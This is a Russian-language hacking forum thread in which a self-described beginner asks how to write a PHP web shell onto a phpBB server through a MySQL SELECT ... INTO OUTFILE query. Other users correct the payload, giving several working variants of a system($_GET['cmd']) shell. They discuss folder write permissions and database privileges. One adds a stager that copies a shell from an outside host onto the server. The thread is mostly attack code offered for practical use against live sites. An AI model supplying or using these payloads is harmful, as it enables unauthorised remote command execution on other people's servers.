подскажите пожалуйста как правильно выкачать шелл из БД в файл на сервере, мои попытки не увенчались успехом, так как при выборке в файл чего-то символы заменяются их кодом вот пример как я вытаскивал шелл SELECT cat_title INTO OUTFILE 'раскрытый путь/phpbb/cache/shell.php' FROM phpbb_categories where cat_id=1; - это пример как лучше оформить запрос или что нужно вписать в БД текст шелла: <?p system("$_GET[cmd]"); ?>
1) Проверь - разрешена ли запись в папку cache; 2) Шелл - не <?p... , а <?php...; 3) Кавычками обрамлять надо cmd, а не весь текст в скобках (да и то невсегда).
Нифига не получиться форум в сафе режиме можно только через фтп или ищи открытую папку можно не на форуме. Т.к. весь форум закрыт на запись.
>>Нифига не получиться форум в сафе режиме никакой связи между сафе модом в пхп и мускл сервером нет. запросы отсылаются? - отсылаюстся. стало быть достаточно чтобы текущий юзер мускул сервера обльадал необходимыми привилегиями - о них уже писали, и не только на форуме.
спасибо, что указали на ошибки, так как я недавно практикую с хакингом, просто ради интереса. как я понял код должен быть таким: <?php system($_GET["cmd"]); ?> правильно?
Лол млин учись нормально код делать или так Code: <? system(GET['cmd']); ?> или так Code: <?php system(GET['cmd']); ?>
Ну раз уж тема в индексе по запросу заливка шелла через БД, то подниму и дополню <?php copy("http://site.com/1.txt","dir/shell.php"); ?> Сам всё зальёт, если этот файл залили, то вызовем его для заливки шелла, тем более путь по любому нужен.